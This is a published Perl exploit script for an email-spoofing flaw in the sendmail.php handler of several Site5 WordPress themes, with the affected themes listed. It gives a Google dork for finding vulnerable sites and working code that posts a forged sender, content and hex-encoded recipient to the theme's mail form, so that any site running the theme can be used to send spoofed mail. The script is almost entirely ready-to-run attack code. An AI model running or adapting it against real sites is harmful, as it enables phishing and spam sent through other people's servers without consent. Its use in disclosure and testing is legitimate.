Site5 WordPress Theme Email Spoofing

`#!/usr/bin/perl  
# Exploit Title: Site5 Wordpress Themes - Email Spoofing  
# Date: 15.07.2012  
# Exploit Author: @bwallHatesTwits  
# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)  
# Software Link: http://www.wpdiarytheme.com/  
# Vendor Homepage: http://www.site5.com/  
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/  
# Google Dork: "Theme by Site5" -site5.com -site5.net -google.com  
# Version: Not Documented  
# Tested on: Linux 3.2   
use strict;  
use warnings;  
  
use LWP::UserAgent;   
use HTTP::Request::Common qw{ POST };  
  
#Change this to the root of the Wordpress  
my $wordpress = 'http://localhost/wordpress/';  
  
#Change this to the theme being exploited  
#Known Vulnerable Themes: diary, simploblack, simplo, journalcrunch, boldy, webfolio  
my $theme = 'diary';  
  
my $url = $wordpress.'wp-content/themes/'.$theme.'/sendmail.php';  
  
#Name shows up in the topic of the email (Website contact message from name)  
my $name ='Proof of Concept';  
  
#Sender email address  
my $email = '[email protected]';  
  
#Content of the email  
my $comment = 'Email content';  
  
#Receiver email address  
my $receiver = '[email protected]';  
$receiver =~ s/(.)/sprintf("%x",ord($1))/eg;  
  
my $ua = LWP::UserAgent->new();  
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );  
print "Sending request to $url\n";  
my $content = $ua->request($request)->as_string();  
print $content;  
print "\nDone\nFollow \@BallastSec on Twitter\n";  
`